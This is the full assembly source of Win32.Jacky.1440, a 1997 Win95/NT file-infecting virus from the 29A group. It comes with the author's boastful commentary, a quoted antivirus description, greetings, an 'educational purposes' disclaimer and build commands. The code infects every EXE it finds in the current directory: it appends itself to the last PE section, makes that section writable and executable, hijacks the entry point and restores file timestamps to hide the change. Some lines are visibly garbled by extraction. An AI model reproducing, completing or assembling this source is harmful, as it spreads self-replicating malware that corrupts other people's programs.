2022-08-21 09:07:57 +00:00
; Win32.Jacky.1440 <20> <> <EFBFBD> <20> <> <EFBFBD> <20> <> <EFBFBD> <20> <> <EFBFBD> <20> <> <EFBFBD> <20> <> <EFBFBD>
; Hello ppl, welcome to the first "Winblowz" 95/NT fully compatible virus.
; Yea i didnt mistype above, it reads "Win32" not "Win95" coz this babe is
; really a "genuine" Win32 virus, which means it should be able to infect
; any Win32 based system: Windoze 95, Windoze NT or Win32s. For some known
; reasonz that i wont delve in detail here, previous Win95 virusez were una-
; ble to spread succesfully under NT. The main reasonz were becoz they asu-
; med KERNEL32 bein loaded at a fixed base adress (not true for NT or even
; future Win95 updatez) and they also made a "guess" about where the Win32
; API functionz were located inside the KERNEL32 itself.
; This virus does NOT rely on fixed memory positionz or absolute adressez in
; order to run and spread. It always works at the Win32 API level, not play-
; in its trickz "under the hood". This proves enough for the virus to spread
; succesfully on NT, asumin the user has enough rightz, of course.
; Unfortunately, this virus didnt make it as the first Windoze NT virus for
; the media. AVerz said they didnt have an NT machine available for virus
; testin, so they simply didnt test it under NT. Well ehem, thats what they
; said #8S. In the past summer however i finished the codin of Win32.Cabanas
; which is a far superior virus with much more featurez than its predecesor.
; This time, the guyz from Datafellowz and AVP made serious testz with Caba-
; nas under NT until they finally concluded: "Oh miracle! it is able to work
; under NT!". So acordin to the media, Win32.Cabanas is the first WinNT vi-
; rus and not Win32.Jacky as it should have been. Anywayz..
; Technical description
; When Win32.Jacky executes, it first looks for KERNEL32 base adress usin
; the GetModuleHandleA API right from the host import table and then it re-
; trieves all other file API function adressez by usin the GetProcAdress API
; also from the import table. These APIz are not inserted by the virus when
; infection, they are only used if they already existed there (very likely),
; but this is not a "must do" for the virus to work tho. After all Win32 API
; functionz needed by the virus have been located, it looks for PE (EXE) fi-
; lez in the current directory and infects them one by one.
; When infection starts, each EXE file is opened and maped in shared memory
; usin the "file mapin" API functionz provided by KERNEL32. This proves to
; be a great advance regardin file functionz as it clearly simplifies to a
; large extent the infection process and file handlin in general. After the
; PE signature is detected from the maped file, the virus inspects its im-
; port table lookin for the GetModuleHandleA and GetProcAddress APIz inside
; the KERNEL32 import descriptor. If this module is not imported, the file
; is left alone and discarded. If the GetProcAddress API is not found, the
; virus (later on when it executes) will call its own internal GetProcAd-
; dressET function, which simply inspects the KERNEL32 export table lookin
; for any specified Win32 API function. If GetModuleHandleA is not found the
; file will still get infected but then the virus, in order to find the KER-
; NEL32 base adress, will be relyin on a smoewhat undocumented feature (che-
; cked before use). This feature is very simple: whenever a PE file with un-
; bound KERNEL32 function adressez is loaded, the Win95 loader puts the KER-
; NEL32 adress in the ForwarderChain field of the KERNEL32 import descrip-
; tor. This also works in Win95 OSR2 version but doesnt work on WinNT tho,
; so it should be used with some care after makin some sanity checkz first.
; If the GetModuleHandleA and GetProcAddrss APIz are found, the virus will
; hardcode their IAT referencez inside the virus code, then later on when
; the virus executes, it will have these API referencez already waitin to be
; called by the installation code. After the latter API search is done, the
; virus copies itself to the last section in the file, modifies the section
; atributez to acomodate the virus code and finally changes the EntryPoint
; field in the PE header to point to the virus code. The virus doesnt change
; or modify the time/date stamp of infected filez nor it is stoped by the
; "read only" atribute.
; AVP description
; Before jumpin to the source code, lets read what AVP has to say about the
; virus. Unfortunately as u will see they didnt test the thing on NT, other-
; wise they would have had a big surprise with it hehe #8D
; (*) Win95.Jacky - http://www.avp.ch/avpve/newexe/win95/jacky.stm *
;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
; It is a harmless nonmemory resident parasitic Win95/NT virus 1440
; bytes of length. Being executed the virus scans Win95/NT kernel and
; gets undocumented addresses of system file access function (see the
; list below). Then it searches for NewEXE Portable Executable
; (Win95 and NT) files and writes itself to the end of the file. The
; virus aligns the file length to the section, so the file lengths
; grows more that 1440 bytes while infection.
; This is the first known Win95/NT parasitic virus that does not add
; new section to the file - while infecting a file the virus writes
; itself to the end of the file, increases the size of last section
; in the file, and modifies characteristics of this section. So,
; only entry point address, size and characteristics of last section
; are modified in infected files.
; This is also first known to me Win95/NT infector that did work on
; my test computer (Windows95) without any problem. I did not try it
; under NT.
; The virus contains the encrypted strings, a part of these strings
; are the names of system functions that are used during infection:
; KERNEL32 GetModuleHandleA GetProcAddress
; *.EXE
; CreateFileA CreateFileMappingA CloseHandle UnmapViewOfFile
; MapViewOfFile FindFirstFileA FindNextFileA FindClose
; SetFileAttributesA SetFilePointer SetEndOfFile SetFileTime
; To My d34d fRi3nD c4b4n4s..
; A Win/NT/95 ViRuS v1.00.
; By: j4cKy Qw3rTy / 29A.
; jqw3rty@cryogen.com
;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
; Greetingz
; And finaly the greetinz go to:
; Mr.Chan, Wai ......... Thx for your help and advice.. master!
; MrSandman/29A ........ erm.. when will 29A#2 go out? hehe ;)
; QuantumG ............. What about yer NT resident driver idea?
; DarkSide1 ............ We are Southamerican rockerzzz!
; GriYo/29A ............ Implant poly rulez!
; Disclaimer
; This source code is for educational purposez only. The author is not res-
; ponsible for any problemz caused due to the assembly of this file.
; Compiling it
; tasm32 -ml -m5 -q -zn w32jacky.asm
; tlink32 -Tpe -c -x -aa w32jacky,,, import32
; pewrsec w32jacky.exe
; (c) 1997 Jacky Qwerty/29A.
.model flat ;whoaa.. no more segmentz
;Some includez containin very useful structurez and constantz for Win32
include Useful.inc
include Win32API.inc
include MZ.inc
include PE.inc
;Some equ's needed by the virus
work_size equ 4000h ;size to grow up memory maped file
size_pad equ 101 ;size paddin to mark infected filez
v_size equ v_end - v_start ;virus absolute size in filez
extrn GetModuleHandleA : proc ;APIs used durin first generation only
extrn GetProcAddress : proc
db ? ;some dummy data so tlink32 dont yell
;Virus code starts here
push eax ;make space to store return adress
pushad ;save all
call get_deltaz ;here we go
;API namez needed by the virus. They will travel in encrypted form
veszKernel32 db 'KERNEL32' , 0
veszGetModuleHandleA db 'GetModuleHandleA' , 0
veszGetProcAddress db 'GetProcAddress' , 0
eEXE_filez db '*.EXE' , 0 ;filez to search
veszCreateFileA db 'CreateFileA' , 0
veszCreateFileMappingA db 'CreateFileMappingA' , 0
veszCloseHandle db 'CloseHandle' , 0
veszUnmapViewOfFile db 'UnmapViewOfFile' , 0
veszMapViewOfFile db 'MapViewOfFile' , 0
veszFindFirstFileA db 'FindFirstFileA' , 0
veszFindNextFileA db 'FindNextFileA' , 0
veszFindClose db 'FindClose' , 0
veszSetFileAttributesA db 'SetFileAttributesA' , 0
veszSetFilePointer db 'SetFilePointer' , 0
veszSetEndOfFile db 'SetEndOfFile' , 0
veszSetFileTime db 'SetFileTime' , 0
eEndOfFunctionNames db 0
;An epitaph to a good friend of mine (not a "junkie" Pete)
db 'To My d34d fRi3nD c4b4n4s..' , CRLF
db 'A Win/NT/95 ViRuS v1.00. ' , CRLF
db 'By: j4cKy Qw3rTy / 29A. ' , CRLF
db 'jqw3rty@cryogen.com' , 0
ve_string_size = $ - ve_stringz
crypt: lodsb ;decrypt API stringz
rol al , cl
not al
loop crypt
mov ecx , ve_string_size
pop esi ;get pointer to ve_stringz
lea ebp ,[ esi + v_end - ve_stringz ] ;get pointer to virus end
lea eax ,[ esi + v_start - ve_stringz ]
mov edi , ebp
stosd ;save pointer to virus start
add eax , - 12345678h
delta_host = dword ptr $ - 4
stosd ;save current host base adress
lea edi ,[ ebp + v_stringz - v_end ] ;get pointer to API namez
sub eax , - 12345678h
phost_start_rva = dword ptr $ - 4
push edi ;push pointer to "KERNEL32" string
xchg ebx , eax
mov [ esp . ( Pshd ) .cPushad.RetAddr ], ebx ;save host entry to return
call crypt ;decrypt encrypted API and stringz
call MyGetModuleHandleA ;get KERNEL32 base adress
jecxz jmp_host_2
mov [ ebp + K32Mod - v_end ], ecx ;save it
lea esi ,[ ebp + FunctionNamez - v_end ]
lea edi ,[ ebp + FunctionAddressez - v_end ]
GetAPIAddress: ;get adressez of API functionz used by the virus
push esi
call MyGetProcAddressK32 ;get API adress
jecxz jmp_host
xchg eax , ecx
stosd ;save retrieved API adress
lodsb ;point to next API name
test al , al
jnz $ - 3
cmp al ,[ esi ] ;end of API namez reached?
jnz GetAPIAddress ;no, get next API adress
lea ebx ,[ ebp + FindData - v_end ] ;Find filez matchin *.EXE
push ebx
lea eax ,[ ebp + EXE_filez - v_end ]
push eax
call [ ebp + ddFindFirstFileA - v_end ] ;call FindFirstFileA API
inc eax
jz jmp_host
dec eax
push eax ;save search handle
Process_File: ;check file and infect it
lea edx ,[ ebx .WFD_szFileName ]
call Open & MapFile ;open and map file
jecxz Find_Next
xor eax , eax
cmp [ ebx .WFD_nFileSizeHigh ], eax ;skip filez too large (>1GB)
jnz Cl ose_File
add eax ,[ ebx .WFD_nFileSizeLow ]
js Cl ose_File
add eax , - 80h ;skip filez too short
jnc Cl ose_File
call Ch eck_PE_sign ;it has to be a PE file
jnz Cl ose_File
test ah , IMAGE_FILE_DLL shr 8 ;can't have DLL bit
jnz Cl ose_File
xor ecx , ecx
mov eax ,[ ebx .WFD_nFileSizeLow ] ;check if file is infected
mov cl , si ze_pad
div ecx
mov esi , edx ;esi == 0, file already infected or not infectable
;esi != 0, file not infected, i.e. infect it!
call Cl ose & UnmapFile ;close and unmap file
mov ecx , esi
jecxz Find_Next ;jump and find next file
call Infect ;infect file
pop eax ;find next file
push eax ebx eax
call [ ebp + ddFindNextFileA - v_end ]
test eax , eax
jnz Process_File
call [ ebp + ddFindClose - v_end ] ;no more filez, close search
popad ;jump to host
Infect proc ;blank file attributez, open and map file in r/w mode,
;infect it, restore date/time stamp and attributez
lea edx ,[ ebx .WFD_szFileName ] ;get filename
push edx 0 edx
call [ ebp + ddSetFileAttributesA - v_end ] ;blank file attributez
xchg ecx , eax
pop edx
jecxz end_Infect1
mov edi , work_size
add edi ,[ ebx .WFD_nFileSizeLow ]
call Open & MapFileAdj ;open and map file in read/write mode
jecxz end_Infect2
lea esi ,[ ebp + vszKernel32 - v_end ]
lea eax ,[ ebp + vszGetModuleHandleA - v_end ]
push eax esi
lea eax ,[ ebp + vszGetProcAddress - v_end ]
push eax esi ecx
call GetProcAddressIT ;get ptr to GetProcAddress API
mov [ ebp + ddGetProcAddress - v_end ], eax
push ecx
xor esi , esi
call GetProcAddressIT ;get ptr to GetModuleHandleA API
mov [ ebp + ddGetModuleHandleA - v_end ], eax
test eax , eax
jnz GetModHandle_found ;if GetModuleHandleA found,
test esi , esi ;jump and attach virus
jz end_Infect3 ;KERNEL32 import descriptor not found,
;then dont infect
;GetModuleHandleA not found
cmp [ esi .ID_TimeDateStamp - x ], eax ;check if we can rely on
jz got_easy ;the ForwarderChain trick
cmp eax ,[ esi .ID_OriginalFirstThunk - x ]
jz end_Infect3
mov [ esi .ID_TimeDateStamp - x ], eax
mov eax ,[ esi .ID_ForwarderChain - x ] ;hardcode pointerz to
mov [ ebp + ptrForwarderChain - v_end ], edx ;the ForwarderChain
mov [ ebp + ddForwarderChain - v_end ], eax ;field
mov esi ,[ ebp + pv_start - v_end ]
call Attach ;attach virus to host
call Cl ose & UnmapFileAdj ;close and unmap file
mov ecx ,[ ebx .WFD_dwFileAttributes ] ;restore original atribute
jecxz end_Infect1
lea edx ,[ ebx .WFD_szFileName ]
push ecx edx
call [ ebp + ddSetFileAttributesA - v_end ]
Infect endp
Check_PE_sign proc ;checks validity of a PE file
; on entry: EDX = host file size
; ECX = base address of memory-maped file
; EBX = pointer to WIN32_FIND_DATA structure
; EAX = host file size - 80h
; on exit: Zero flag = 1, infectable PE file
; Zero flag = 0, not infectable file
cmp word ptr [ ecx ], IMAGE_DOS_SIGNATURE ;needs MZ signature
jnz end_check_PE_sign
cmp word ptr [ ecx .MZ_lfarlc ], 40h ;needs Win signature
jb end_check_PE_sign ;(well not necesarily)
mov edi ,[ ecx .MZ_lfanew ] ;get ptr to new exe format
cmp eax , edi ;ptr out of range?
jb end_check_PE_sign
add edi , ecx
cmp dword ptr [ edi ], IMAGE_NT_SIGNATURE ;check PE signature
jnz end_check_PE_sign
cmp word ptr [ edi .NT_FileHeader.FH_Machine ], \ ;must be 386+
jnz end_check_PE_sign
mov eax , dword ptr [ edi .NT_FileHeader.FH_Characteristics ]
not al
test al , IMAGE_FILE_EXECUTABLE_IMAGE ;must have the executable bit
Check_PE_sign endp
Open & MapFile proc ;open and map file in read only mode
; on entry:
; EDX = pszFileName (pointer to file name)
; on exit:
; ECX = 0, if error
; ECX = base adress of memory-maped file, if ok
xor edi , edi
Open & MapFileAdj : ;open and map file in read/write mode
; on entry:
; EDI = file size + work space (in bytes)
; EDX = pszFileName (pointer to file name)
; on exit:
; ECX = 0, if error
; ECX = base adress of memory-maped file, if ok
; EDI = old file size
xor eax , eax
push eax eax OPEN_EXISTING eax eax
mov al , 1
ror eax , 1
mov ecx , edi
jecxz $ + 4
rcr eax , 1
push eax edx
call [ ebp + ddCreateFileA - v_end ] ;open file
inc eax
jz end_Open & MapFile
dec eax
push eax ;push first handle
xor esi , esi
push edx edi edx
mov ecx , edi
jecxz $ + 4
shl dl , 1
push edx esi eax
call [ ebp + ddCreateFileMappingA - v_end ] ;create file
cdq ;mapping
xchg ecx , eax
jecxz end_Open & MapFile2
push ecx ;push second handle
push edi edx edx
mov dl , FILE_MAP_READ
test edi , edi
jz OMF_RdOnly
shr dl , 1
mov edi ,[ ebx .WFD_nFileSizeLow ]
OMF_RdOnly: push edx ecx
call [ ebp + ddMapViewOfFile - v_end ] ;map view of file
xchg ecx , eax
jecxz end_Open & MapFile3
push ecx ;push base address of
;memory-mapped file
jmp [ esp . ( 3 * Pshd ) .RetAddr ] ;jump to return adress leavin
;parameterz in the stack
Open & MapFile endp
Close & UnmapFile proc ;close and unmap file previosly opened in r/o mode
xor edi , edi
Close & UnmapFileAdj : ;close and unmap file previosly opened in r/w mode
pop eax ;return adress
mov [ esp . ( 3 * Pshd ) .RetAddr ], eax
call [ ebp + ddUnmapViewOfFile - v_end ] ;unmap view of file
end_Open & MapFile3 :
call [ ebp + ddCloseHandle - v_end ] ;close handle
mov ecx , edi
jecxz end_Open & MapFile2 ;if read only mode jump
pop eax
push eax eax
xor esi , esi
push esi esi edi eax
xchg edi , eax
call [ ebp + ddSetFilePointer - v_end ] ;move file pointer to
;the real end of file
call [ ebp + ddSetEndOfFile - v_end ] ;truncate file at
lea eax ,[ ebx .WFD_ftLastWriteTime ] ;real end of file
push eax esi esi edi
call [ ebp + ddSetFileTime - v_end ] ;restore original
;date/time stamp
end_Open & MapFile2 :
call [ ebp + ddCloseHandle - v_end ] ;close handle
end_Open & MapFile :
xor ecx , ecx
Close & UnmapFile endp
Attach proc ;attach virus code to last section in the PE file and
; change section characteristicz to reflect infection
;on entry:
; ECX = base of memory-maped file
; ESI = pointer to start of virus code
;on exit:
; EDI = new file size
push ecx
mov ebp , ecx ;get base adress
add ebp ,[ ebp .MZ_lfanew ] ;get PE header base
movzx ecx , word ptr [ ebp .NT_FileHeader \ ;get Number of Sections
.FH_NumberOfSections ]
xor eax , eax
movzx edi , word ptr [ ebp .NT_FileHeader \ ;get 1st section header
.FH_SizeOfOptionalHeader ]
mov al , x
mul ecx ;get last section header
pop edx
jecxz end_Attach2
add edi , eax
lea ebx ,[ ebp .NT_OptionalHeader + edi ]
mov ecx ,[ ebx .SH_SizeOfRawData - x ]
mov eax ,[ ebx .SH_VirtualSize - x ]
cmp ecx , eax
jnc $ + 3
xchg eax , ecx
add edx ,[ ebx .SH_PointerToRawData - x ]
sub eax , - 3
mov ecx ,( v_size + 3 ) / 4
and al , - 4
lea edi ,[ eax + edx ] ;find pointer in last section where virus
cld ;will be copied
rep movsd ;copy virus
add eax ,[ ebx .SH_VirtualAddress - x ] ;calculate virus entry point
mov ecx ,[ ebp .NT_OptionalHeader.OH_FileAlignment ] ;in RVA
jecxz end_Attach
push eax ;virus entry point
lea esi ,[ edi + ( phost_start_rva - v_start ) - (( v_size + 3 ) \
and ( - 4 ))]
neg eax
sub edi , edx
mov [ esi + delta_host - phost_start_rva ], eax ;harcode delta to
lea eax ,[ ecx + edi - 1 ] ;host base adress
cdq ;edx=0
sub edx ,[ ebp .NT_OptionalHeader.OH_AddressOfEntryPoint ]
mov [ esi ], edx ;hardcode delta to original entry point RVA
cdq ;edx=0
div ecx
pop esi ;virus entry point
mul ecx ;calculate new size of section (raw data)
xchg eax , edi
mov ecx ,[ ebp .NT_OptionalHeader.OH_SectionAlignment ]
add eax ,( virtual_end - v_end + 3 ) and ( - 4 )
jecxz end_Attach
cmp [ ebx .SH_VirtualSize - x ], eax
jnc n_vir
mov [ ebx .SH_VirtualSize - x ], eax ;store new size of section (RVA)
n_vir: dec eax
mov [ ebx .SH_SizeOfRawData - x ], edi ;store new size of section
add eax , ecx ;(raw data)
div ecx
mul ecx
add eax ,[ ebx .SH_VirtualAddress - x ]
cmp [ ebp .NT_OptionalHeader.OH_SizeOfImage ], eax
jnc n_img
mov [ ebp .NT_OptionalHeader.OH_SizeOfImage ], eax ;store new size
;of image (RVA)
n_img: add edi ,[ ebx .SH_PointerToRawData - x ] ;get new file size
sub ecx , ecx
or byte ptr [ ebx .SH_Characteristics.hiw.hib - x ], 0E0h ;change
; (IMAGE_SCN_MEM_EXECUTE or \ ;section characte-
; IMAGE_SCN_MEM_READ or \ ;risticz to: execute,
; IMAGE_SCN_MEM_WRITE) shr 12 ;read & write access
pop eax ;get original file size
mov cl , si ze_pad
cdq ; edx=0
cmp edi , eax ;compare it with new file size
jc $ + 3
xchg edi , eax ;take the greater
sub eax , 1 - si ze_pad
div ecx
mul ecx ;grow file size to a multiple of size_pad
push eax
mov [ ebp .NT_OptionalHeader.OH_AddressOfEntryPoint ], esi ;change
;entry point
Attach endp
GetProcAddressIT proc ;gets a pointer to an API function from the Import Table
; (the object inspected is in raw form, ie memory-maped)
;on entry:
; TOS+0Ch (Arg3): API function name
; TOS+08h (Arg2): module name
; TOS+04h (Arg1): base adress of memory-maped file
; TOS+00h (return adress)
;on exit:
; EAX = RVA pointer to IAT entry
; EAX = 0, if not found
mov ebp ,[ esp .cPushad.Arg1 ] ;get Module Handle from Arg1
lea esi ,[ ebp .MZ_lfanew ]
add esi ,[ esi ] ;get address of PE header + MZ_lfanew
mov ecx ,[ esi .NT_OptionalHeader \ ;get size of import directory
.OH_DirectoryEntries \
.DE_Import \
.DD_Size \
- MZ_lfanew ]
jecxz End_GetProcAddressIT2 ;if size is zero, no API imported!
movzx ecx , word ptr [ esi .NT_FileHeader \ ;get number of sectionz
.FH_NumberOfSections \
- MZ_lfanew ]
jecxz End_GetProcAddressIT2
movzx ebx , word ptr [ esi .NT_FileHeader \ ;get 1st section header
.FH_SizeOfOptionalHeader \
- MZ_lfanew ]
lea ebx ,[ esi .NT_OptionalHeader + ebx - MZ_lfanew ]
match_virtual: ;find section containin the import table. (not necesarily
;its in the .idata section!)
mov edi ,[ esi .NT_OptionalHeader \ ;get address of import table
.OH_DirectoryEntries \
.DE_Import \
.DD_VirtualAddress \
- MZ_lfanew ]
mov edx ,[ ebx .SH_VirtualAddress ] ;get RVA start pointer of
sub edi , edx ;current section
add ebx , x
cmp edi ,[ ebx .SH_VirtualSize - x ] ;address of import table
;inside current section?
jb import_section_found ;yea, we found it
loop match_virtual ;no, try next section
jmp End_GetProcAddressIT ;no more sectionz, shit.. go
push edi
mov eax ,[ ebx .SH_SizeOfRawData - x ]
mov ebx ,[ ebx .SH_PointerToRawData - x ]
xchg ebp , eax ;get RAW size of import section (EBP)
add ebx , eax ;get RAW start of import section (EBX)
Get_DLL_Name: ;scan each import descriptor inside import section to match
;module name specified
pop esi ;diference (if any) between start
;of imp.table and start of imp.section
mov ecx ,[ ebx .esi.ID_Name ] ;get RVA pointer to imp.module name
jecxz End_GetProcAddressIT ;end of import descriptorz?
sub ecx , edx ;convert RVA pointer to RAW
cmp ecx , ebp ;check if it points inside section
jae End_GetProcAddressIT
add esi , x
push esi ;save next import descriptor for later
lea esi ,[ ebx + ecx ] ;retrieval
mov edi ,[ esp . ( Pshd ) .cPushad.Arg2 ] ;get module name specified
;from Arg2
Next_char_from_DLL: ;do a char by char comparison with module name found
;inside section. Stop when a NULL or a dot is found
add al , - '.'
jz IT_nup ;its a dot
sub al , - '.' + 'a'
cmp al , 'z' - 'a' + 1
jae no_up
add al , - 20h ;convert to upercase
no_up: sub al , - 'a'
IT_nup: scasb
jnz Get_DLL_Name ;names dont match, get next import descriptor
cmp byte ptr [ edi - 1 ], 0
jnz Next_char_from_DLL
Found_DLL_name: ;we got the import descriptor containin specified module name
pop esi
lea eax ,[ edx + esi .ID_ForwarderChain - x ]
add esi , ebx
mov [ esp .Pushad_edx ], eax ;store ptr to ForwarderChain for l8r
mov [ esp .Pushad_esi ], esi ;store ptr to imp.descriptor for l8r
push dword ptr [ esp .cPushad.Arg3 ]
mov eax ,[ esp . ( Pshd ) .Pushad_ebp ]
push dword ptr [ eax + K32Mod - v_end ]
call GetProcAddressET ;scan exp.table of spec.module handle
xchg eax , ecx ;and get function adress of spec.API
mov ecx ,[ esi .ID_FirstThunk - x ] ;This is needed just in case the
;API function adressez are bound
jecxz End_GetProcAddressIT ;if not found then go, this value cant
;be zero or the IAT wont be patched
push eax
call GetProcAddrIAT ;inspect first thunk (which later will
test eax , eax ;be patched by the loader)
jnz IAT_found ;if found then jump (save it and go)
mov ecx ,[ esi .ID_OriginalFirstThunk - x ] ;get original thunk
;(which later will hold the original
;unpatched IAT)
jecxz End_GetProcAddressIT ;if not found then go, this value
push eax ;could be zero
call GetProcAddrIAT ;inspect original thunk
test eax , eax
jz IAT_found ;jump if not found
sub eax , ecx ;we got the pointer
add eax ,[ esi .ID_FirstThunk - x ] ;convert it to RVA
db 6Bh , 33h , 0C0h ;imul esi,[ebx],-0C0h ;bizarre! but no jump
org $ - 2 ;necesary!
db 33h , 0C0h ;xor eax,eax ;error, adress not found
mov [ esp .Pushad_eax ], eax ;save IAT entry pointer
ret ( 3 * Pshd ) ;go and unwind parameterz in stack
GetProcAddrIAT: ;this function scans the IMAGE_THUNK_DATA array of "dwords"
; from the selected IMAGE_IMPORT_DESCRIPTOR, searchin for
; the selected API name. This function works for both
; bound and unbound import descriptorz. This function is
; called from inside GetProcAddressIT.
;on entry:
; EBX = RAW start pointer of import section
; EDX = RVA start pointer of import section
; EDI = pointer selected API function name.
; EBP = RAW size of import section
; TOS+04h (Arg1): real address of API function inside selected
; module (in case the descriptor is unbound).
; TOS+00h (return adress)
;on exit:
; EAX = RVA pointer to IAT entry
; EAX = 0, if not found
push ecx
push esi
xor eax , eax
sub ecx , edx
cmp ecx , ebp
jae IT_not_found
lea esi ,[ ebx + ecx ] ;get RAW pointer to IMAGE_THUNK_DATA array
lodsd ;get dword value
test eax , eax ;end of IMAGE_THUNK_DATA array?
jz IT_not_found
sub eax , edx ;convert dword to a RAW pointer
cmp eax , ebp ;dword belongs to an unbound image descriptor?
jb IT_search ;no, jump
add eax , edx ;we have the API adress, reconvert to RVA
cmp eax ,[ esp . ( 2 * Pshd ) .Arg1 ] ;API adressez match?
jmp IT_found? ;yea, we found it, jump
push esi ;image descr.contains imports by name
lea esi ,[ ebx + eax .IBN_Name ] ;get API name from import descriptor
mov edi ,[ esp . ( 5 * Pshd ) .cPushad.Arg3 ] ;get API name selected as a
;find req.API from all imported API namez
cmpsb ;do APIz match?
jnz IT_new_search ;no, continue searchin
cmp byte ptr [ esi - 1 ], 0
jnz IT_next_char
pop esi ;yea, they match, we found it
jnz next_thunk_dword
lea eax ,[ edx + esi - 4 ] ;get the pointer to the new IAT entry
sub eax , ebx ;convert it to RVA
pop esi
pop ecx
ret ( Pshd )
GetProcAddressIT endp
GetProcAddressET proc ;This function is similar to GetProcAddressIT except
; that it looks for API functions in the export table
; of a given DLL module. It has the same functionality
; as the original GetProcAddress API exported from
; KERNEL32 except that it is able to find API
; functions exported by ordinal from KERNEL32.
;on entry:
; TOS+08h (Arg2): pszAPIname (pointer to API name)
; TOS+04h (Arg1): module handle/base address of module
; TOS+00h (return adress)
;on exit:
; ECX = API function address
; ECX = 0, if not found
mov eax ,[ esp .cPushad.Arg1 ] ;get Module Handle from Arg1
mov ebx , eax
add eax ,[ eax .MZ_lfanew ] ;get address of PE header
mov ecx ,[ eax .NT_OptionalHeader \ ;get size of Export directory
.OH_DirectoryEntries \
.DE_Export \
.DD_Size ]
jecxz Proc_Address_not_found ;size is zero, No API exported !
mov ebp , ebx ;get address of Export directory
add ebp ,[ eax .NT_OptionalHeader \
.OH_DirectoryEntries \
.DE_Export \
.DD_VirtualAddress ]
ifndef NoOrdinal
mov eax ,[ esp .cPushad.Arg2 ] ;get address of requested API name or
;ordinal value from Arg2
test eax , - 10000h ;check if Arg2 is an ordinal
jz Its_API_ordinal
push ecx
mov edx , ebx ;get address of exported API names
add edx ,[ ebp .ED_AddressOfNames ]
mov ecx ,[ ebp .ED_NumberOfNames ] ;get number of exported API names
xor eax , eax
mov esi , ebx ;get address of next exported API name
add esi ,[ edx + eax * 4 ]
mov edi ,[ esp .Pshd.cPushad.Arg2 ] ;get address of requested API name
;from Arg2
cmpsb ;find requested API from all
jz Matched_char_in_API_name ;exported API namez
inc eax
loop Search_for_API_name
pop eax
xor eax , eax ;API not found
jmp End_GetProcAddressET
ifndef NoOrdinal
sub eax ,[ ebp .ED_BaseOrdinal ] ;normalize Ordinal, i.e.
jmp Ch eck_Index ;convert it to an index
cmp byte ptr [ esi - 1 ], 0 ;end of API name reached?
jnz Next_Char_in_API_name
pop ecx
mov edx , ebx ;get address of exp.API ordinals
add edx ,[ ebp .ED_AddressOfOrdinals ]
movzx eax , word ptr [ edx + eax * 2 ] ;get index into exp.API functions
cmp eax ,[ ebp .ED_NumberOfFunctions ] ;check for out of range index
jae Proc_Address_not_found
mov edx , ebx ;get address of exported API functions
add edx ,[ ebp .ED_AddressOfFunctions ]
add ebx ,[ edx + eax * 4 ] ;get address of requested API function
mov eax , ebx
sub ebx , ebp ;take care of forwarded API functions
cmp ebx , ecx
jb Proc_Address_not_found
mov [ esp .Pushad_ecx ], eax ;set requested Proc Address, if found
ret ( 2 * Pshd )
GetProcAddressET endp
MyGetProcAddressK32: ;this function is simply a wraper to the GetProcAddress
; API. It retrieves the address of an API function
; exported from KERNEL32.
;on entry:
; TOS+04h (Arg1): pszAPIname (pointer to API name)
; TOS+00h (return adress)
;on exit:
; ECX = API function address
; ECX = 0, if not found
pop eax
push dword ptr [ ebp + K32Mod - v_end ] ;KERNEL32 module handle
push eax
MyGetProcAddress proc
mov ecx , 12345678h ;this dynamic variable will hold an RVA
dd GetProcAddress = dword ptr $ - 4 ;pointer to the GetProcAddress API in
;the IAT
jecxz GetProcAddressET
push [ esp .Arg2 ]
push [ esp . ( Pshd ) .Arg1 ]
add ecx ,[ ebp + phost_hdr - v_end ]
call [ ecx ] ;call the original GetProcAddress API
xchg ecx , eax
jecxz gotoGetProcAddressET ;if error, call my own GetProcAddress
ret ( 2 * Pshd ) ;function
MyGetProcAddress endp
MyGetModuleHandleA proc ;this function retrieves the base address/module
;handle of a DLL module previosly loaded to memory.
pop ecx
pop eax
push ecx
mov edx ,[ ebp + phost_hdr - v_end ]
mov ecx , 12345678h ;this dynamic variable will hold an RVA
dd GetModuleHandleA = dword ptr $ - 4 ;pointer to the GetModuleHandleA API in
jecxz ch eck_K32 ;the IAT
push eax
call [ ecx + edx ] ;call the original GetModuleHandleA API
xor ecx , ecx
jmp really_PE?
mov eax ,[ edx + 12345678h ] ;this dynamic variable will hold an
;RVA pointer to the ForwarderChain
;field in the KERNEL32 import
;descriptor. This is an undocumented
ptrForwarderChain = dword ptr $ - 4 ;feature to get the K32 base address
inc eax
jz End_GetModHandleA ;make sure the base address is ok
dec eax
jz End_GetModHandleA
cmp eax , 12345678h ;this dynamic variable will hold the
;prev.contents of the ForwarderChain
;field in the K32 import descriptor
dd ForwarderChain = dword ptr $ - 4 ;if they match, then the Win32 loader
jz End_GetModHandleA ;didnt copy the K32 base address
cmp word ptr [ eax ], IMAGE_DOS_SIGNATURE ;make sure its the base
jnz End_GetModHandleA ;address of a PE module
mov edx ,[ eax .MZ_lfanew ]
cmp dword ptr [ eax + edx ], IMAGE_NT_SIGNATURE
jnz End_GetModHandleA
xchg ecx , eax
MyGetModuleHandleA endp
align 4 ;set dword alignment
;uninitialized data ;these variablez will be addressed in memory, but
;dont waste space in the file
pv_start dd ? ;pointer to virus start in memory
phost_hdr dd ? ;ptr to the host base address in mem
K32Mod dd ? ;KERNEL32 base address
FunctionAddressez: ;these variables will hold the API function addressez
;used in the virus
dd CreateFileA dd ?
dd CreateFileMappingA dd ?
dd Cl oseHandle dd ?
dd UnmapViewOfFile dd ?
dd MapViewOfFile dd ?
dd FindFirstFileA dd ?
dd FindNextFileA dd ?
dd FindClose dd ?
dd SetFileAttributesA dd ?
dd SetFilePointer dd ?
dd SetEndOfFile dd ?
dd SetFileTime dd ?
v_stringz: ;the API names used by the virus are decrypted here
vszKernel32 db 'KERNEL32' , 0
vszGetModuleHandleA db 'GetModuleHandleA' , 0
vszGetProcAddress db 'GetProcAddress' , 0
EXE_filez db '*.EXE' , 0 ;the file mask
vszCreateFileA db 'CreateFileA' , 0
vszCreateFileMappingA db 'CreateFileMappingA' , 0
vszCloseHandle db 'CloseHandle' , 0
vszUnmapViewOfFile db 'UnmapViewOfFile' , 0
vszMapViewOfFile db 'MapViewOfFile' , 0
vszFindFirstFileA db 'FindFirstFileA' , 0
vszFindNextFileA db 'FindNextFileA' , 0
vszFindClose db 'FindClose' , 0
vszSetFileAttributesA db 'SetFileAttributesA' , 0
vszSetFilePointer db 'SetFilePointer' , 0
vszSetEndOfFile db 'SetEndOfFile' , 0
